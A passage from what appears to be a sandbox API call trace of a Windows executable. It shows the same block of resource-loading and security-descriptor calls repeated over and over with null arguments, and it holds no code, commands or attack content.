returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.007] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.007] LockResource (hResData=0x0) returned 0x0 [0220.007] FreeResource (hResData=0x0) returned 0 [0220.007] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.007] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.007] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.008] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.008] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.008] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.008] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.008] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.008] LockResource (hResData=0x0) returned 0x0 [0220.008] FreeResource (hResData=0x0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.009] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.009] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.009] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.009] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.009] LockResource (hResData=0x0) returned 0x0 [0220.009] FreeResource (hResData=0x0) returned 0 [0220.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.010] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.010] LockResource (hResData=0x0) returned 0x0 [0220.010] FreeResource (hResData=0x0) returned 0 [0220.010] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.010] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.010] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.011] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.011] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.011] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.011] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.011] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.011] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.011] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.011] LockResource (hResData=0x0) returned 0x0 [0220.011] FreeResource (hResData=0x0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.012] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.012] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.012] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.012] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.012] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.012] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.012] FreeResource (hResData=0x0) returned 0 [0220.012] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.012] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.012] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.013] LockResource (hResData=0x0) returned 0x0 [0220.013] FreeResource (hResData=0x0) returned 0 [0220.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.014] LockResource (hResData=0x0) returned 0x0 [0220.014] FreeResource (hResData=0x0) returned 0 [0220.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, 